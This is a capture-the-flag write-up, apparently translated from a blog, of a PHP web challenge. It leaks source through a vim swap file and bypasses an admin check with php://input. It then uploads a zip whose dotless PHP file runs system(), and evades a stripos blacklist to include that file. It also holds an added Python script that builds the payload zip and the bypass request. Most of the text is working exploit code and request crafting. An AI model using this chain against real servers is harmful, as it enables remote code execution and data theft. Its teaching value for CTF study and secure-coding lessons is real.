ICS Cloud Management System Customer Service Center Looks Forward to Your Feedback
Challenge: The ICS cloud management system customer service center has a vulnerability; the flag is in the file flag/flag/flag/flag/flag/flag/flag.php at http://47.104.188.226:20001. Find this hidden file. swp? No, no, no... keep looking...
Hmm, this challenge is yet another source-code leak.
Lesson for next time: when a challenge gives no obvious lead, first try every location that might leak source before anything else.
```
http://47.104.188.226:20001/.index.php.swp
http://47.104.188.226:20001/.index.php.swo
http://47.104.188.226:20001/.index.php.swn
```
That is the source leak: the editor swap file gives us the source of index.php.
It contains a file-download function that only works once authentication passes, and the authentication part is:
```php
if(isset($adfile) && file_get_contents($adfile, 'r') === 'Yeah Everything Will Be Ok My Boss') {
    echo "Welcome ! You Are Administrator !";
    $cert = 'Y';
}
```
This is bypassed with php://input: supply php://input as adfile and send the expected sentence "Yeah Everything Will Be Ok My Boss" as the POST body, so file_get_contents() reads our own request body and the comparison succeeds. Then the file parameter is used to download upload.php.
That gives us the source of upload.php:
```php
<?php
if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
    die('no flag flag flag flag !');
}
if (!empty($_FILES)) {
    //properties of the uploaded file
    $name  = $_FILES["filename"]["name"];
    $type  = $_FILES["filename"]["type"];
    $size  = $_FILES["filename"]["size"];
    $temp  = $_FILES["filename"]["tmp_name"];
    $error = $_FILES["filename"]["error"];
    if (strlen($name) >= 6) {
        die('name is too long !');
    }
    if (stripos($name, './') > 0) {
        die('invalid parameter');
    }
    if (stripos($name, 'php') > 0) {
        die('invalid parameter');
    }
    if (substr($name, -3, 3) !== 'zip' && substr($name, -3, 3) !== 'jpg' && substr($name, -3, 3) !== 'png') {
        die('file can not upload ! ');
    }
    if ($error > 0)
        die("Error uploading file! code error.");
    else {
        if ($type !== "application/zip" || $size > 400) //condition for the file
        {
            die("Format not allowed or file size too big!");
        } else {
            if (file_exists('includes')) {
                move_uploaded_file($temp, "includes/uploaded/" . $name);
                echo "Upload complete a!";
                shell_exec('sh /var/www/html/includes/unzip.sh');
            } elseif (file_exists('uploaded')) {
                move_uploaded_file($temp, "uploaded/" . $name);
                echo "Upload complete!";
                shell_exec('sh /var/www/html/includes/unzip.sh');
            }
        }
    }
} else {
    if (isset($_GET['step']) && strlen($_GET['step']) === 20) {
        if (stripos($_GET['step'], 'lag') > 0) { die('error'); }
        if (stripos($_GET['step'], './') > 0) { die('error'); }
        if (stripos($_GET['step'], ' ') > 0)  { die('error'); }
        if (stripos($_GET['step'], '/') > 0)  { die('error'); }
        if (preg_match('/[^\w\d_ -]/si', $_GET['step'])) {
            $_GET['step'] = preg_replace('/[^a-zA-Z0-9_ -]/s', '', $_GET['step']);
            die('error');
        }
        passthru('cat ' . 'uploaded/' . $_GET['step']);
    } else {
        die();
    }
}
?>
```
The source is a big pile of checks, but it boils down to this: we can upload a zip file, the file name must be short (fewer than 6 characters, ending in zip/jpg/png, with no "php" or "./" after the first character), the part's Content-Type must be application/zip and the size at most 400 bytes. After the upload it runs unzip.sh, so fetch http://47.104.188.226:20001/includes/unzip.sh.
That gives us the source of unzip.sh (the asterisks in the listing below were eaten by the blog's markdown and are restored here):
```bash
#/bin/bash
cd ./uploaded
find ./ -size +1M | xargs rm
cd ../
unzip -o ./uploaded/*.zip -d ./uploaded/
rm -rf ./uploaded/*.zip
rm -rf ./uploaded/*.*
rm -rf ./uploaded/.*
cd ./uploaded
find -type d | xargs rm -rf
touch /var/www/html/includes/uploaded/index.php
chmod 000 /var/www/html/includes/uploaded/index.php
```
After extracting, this script deletes every file whose name contains a dot and every subdirectory, then creates an index.php in the upload directory with mode 000 (not readable, so it cannot be included). Anything we want to keep must therefore be a plain file with no dot in its name; the extension is irrelevant because the file will be pulled in through include, which executes it as PHP regardless of name.
So create a file named 123 containing:
```php
<?php system('cat flag/flag/flag/flag/flag/flag/flag.php'); ?>
```
Zip it as 1.zip and upload it, intercepting the request to change the Content-Type of the file part to application/zip. The upload and the unzip succeed. Next we need to include that file to get the flag: index.php has an include routine, but it filters the query string for "uploaded":
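The upload step above, written out as a Python model so it can be checked offline (added example, not code from the writeup or the challenge). It ports the checks of upload.php, crafts the 1.zip archive in memory, checks that the member name survives unzip.sh, and prepares the php://input request for the download step. Nothing is sent; the form field name "filename" and the 400-byte limit come from the leaked source, while passing adfile and file as query parameters on index.php is an assumption (the writeup does not show how $adfile is populated).

```python
"""Model of the upload.php filter and the exploit artifacts (added example, not from the writeup)."""
import io
import zipfile
from typing import List, Optional
from urllib.parse import urlencode
from urllib.request import Request

# The writeup's payload file; the member name has no dot so unzip.sh's `rm -rf *.*` leaves it alone.
PAYLOAD = b"<?php system('cat flag/flag/flag/flag/flag/flag/flag.php'); ?>"
MAX_SIZE = 400  # upload.php rejects $size > 400
AUTH_SENTENCE = b"Yeah Everything Will Be Ok My Boss"


def stripos_gt0(hay: str, needle: str) -> bool:
    """Python model of PHP `stripos($hay, $needle) > 0`: true only for a match past offset 0."""
    return hay.lower().find(needle.lower()) > 0


def upload_filter(name: str, ctype: str, size: int) -> Optional[str]:
    """Port of upload.php's checks; returns the die() message, or None when the file is accepted."""
    if len(name) >= 6:
        return "name is too long !"
    if stripos_gt0(name, "./") or stripos_gt0(name, "php"):
        return "invalid parameter"
    if name[-3:] not in ("zip", "jpg", "png"):
        return "file can not upload ! "
    if ctype != "application/zip" or size > MAX_SIZE:
        return "Format not allowed or file size too big!"
    return None


def survives_unzip_sh(member_name: str) -> bool:
    """unzip.sh removes *.zip, *.*, .* and every directory after extraction."""
    return "." not in member_name and "/" not in member_name


def build_zip(member_name: str = "123", payload: bytes = PAYLOAD) -> bytes:
    """Bytes of a zip holding the single payload file (constructed in memory)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(member_name, payload)
    return buf.getvalue()


def zip_members(data: bytes) -> List[str]:
    """Member names of an in-memory zip (used to check what unzip -o will drop on disk)."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def multipart_body(filename: str, data: bytes, boundary: str = "----boundary1234") -> bytes:
    """multipart/form-data body for the upload. The part's Content-Type is forced to
    application/zip, which is exactly the edit the writeup makes in the intercepted request."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="filename"; filename="{filename}"\r\n'
        "Content-Type: application/zip\r\n\r\n"
    ).encode()
    return head + data + f"\r\n--{boundary}--\r\n".encode()


def auth_bypass_request(base: str, target: str = "upload.php") -> Request:
    """Download request for the auth bypass: adfile=php://input makes file_get_contents()
    read the POST body, which carries the sentence the check compares against.
    Passing adfile/file as query parameters of index.php is an assumption."""
    qs = urlencode({"adfile": "php://input", "file": target})
    return Request(f"{base}/index.php?{qs}", data=AUTH_SENTENCE, method="POST")
```

Run upload_filter() against the intended name "1.zip" with the browser's default type and then with application/zip to see why the intercepting proxy is needed; build_zip() comes in well under the 400-byte limit for this payload.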
```php
function autoload($page) {
    if (stripos($_SERVER['QUERY_STRING'], 'flag') > 0) {
        die('no flag flag flag flag !');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'uploaded') > 0) {
        die('no uploaded uploaded uploaded uploaded !');
    }
    if (stripos($_SERVER['QUERY_STRING'], '?/f') > 0) {
        die('no ?/f ?/f ?/f');
    }
    if (stripos($_SERVER['QUERY_STRING'], 'ata') > 0) {
        die('no ata ata ata');
    }
    if (stripos($_SERVER['QUERY_STRING'], '0') > 0) {
        die('no 0 0 0');
    }
    if (file_exists("./includes/$page.php")) {
        include "./includes/$page.php";
    } elseif (file_exists("./includes/$page")) {
        include "./includes/$page";
    } else {
        echo "File is not exit ";
    }
}
```
The checks use stripos(), which returns the offset of the first match, and offsets start at 0. A match at the very beginning of the query string returns 0, and 0 > 0 is false, so the blacklist never fires for a word placed first. So we construct http://47.104.188.226:20001/index.php?uploaded&page=uploaded/123: the first occurrence of "uploaded" is at offset 0, the later one inside the page value is never looked at, and none of the other blocked strings ("flag", "?/f", "ata", "0") appear.
That bypasses the filter. ./includes/uploaded/123.php does not exist, so autoload() falls through to include "./includes/uploaded/123", our extracted file runs as PHP, and we get the flag. The correct comparison would have been stripos(...) !== false (or, better, an allowlist of page names instead of a blacklist).